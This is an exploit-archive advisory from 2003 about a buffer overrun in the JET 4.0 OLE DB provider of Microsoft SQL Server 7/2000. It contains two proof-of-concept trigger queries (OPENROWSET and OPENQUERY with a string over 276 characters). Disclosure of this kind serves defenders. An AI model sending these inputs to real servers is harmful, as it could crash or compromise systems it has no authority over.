Microsoft SQL Server 7.02000 JET Database Engine 4.0 - Buffer Overrun

2003-05-09T00:00:00
ID EXPLOITPACK:7FB38266CB35FF9EB7619214F3F9F7E0
Type exploitpack
Reporter cesaro
Modified 2003-05-09T00:00:00

Description

Microsoft SQL Server 7.02000 JET Database Engine 4.0 - Buffer Overrun

                                        
                                            source: https://www.securityfocus.com/bid/7541/info

Microsoft SQL Server is prone to an exploitable buffer overrun vulnerability via the Jet Database Engine. This can occur while the JET 4.0 OLE DB data provider is querying data supplied via a remote source and is due to insufficient bounds checking of parameters of heterogeneous or ad hoc query methods.

select * from openrowset('microsoft.jet.oledb.4.0','c:\anydatabase.mdb';'admin';'','select XXX...()')

or

select * from Openquery(SomeJet40LinkedServer,'Select XXX...()')


(where XXX... is more than 276 chars)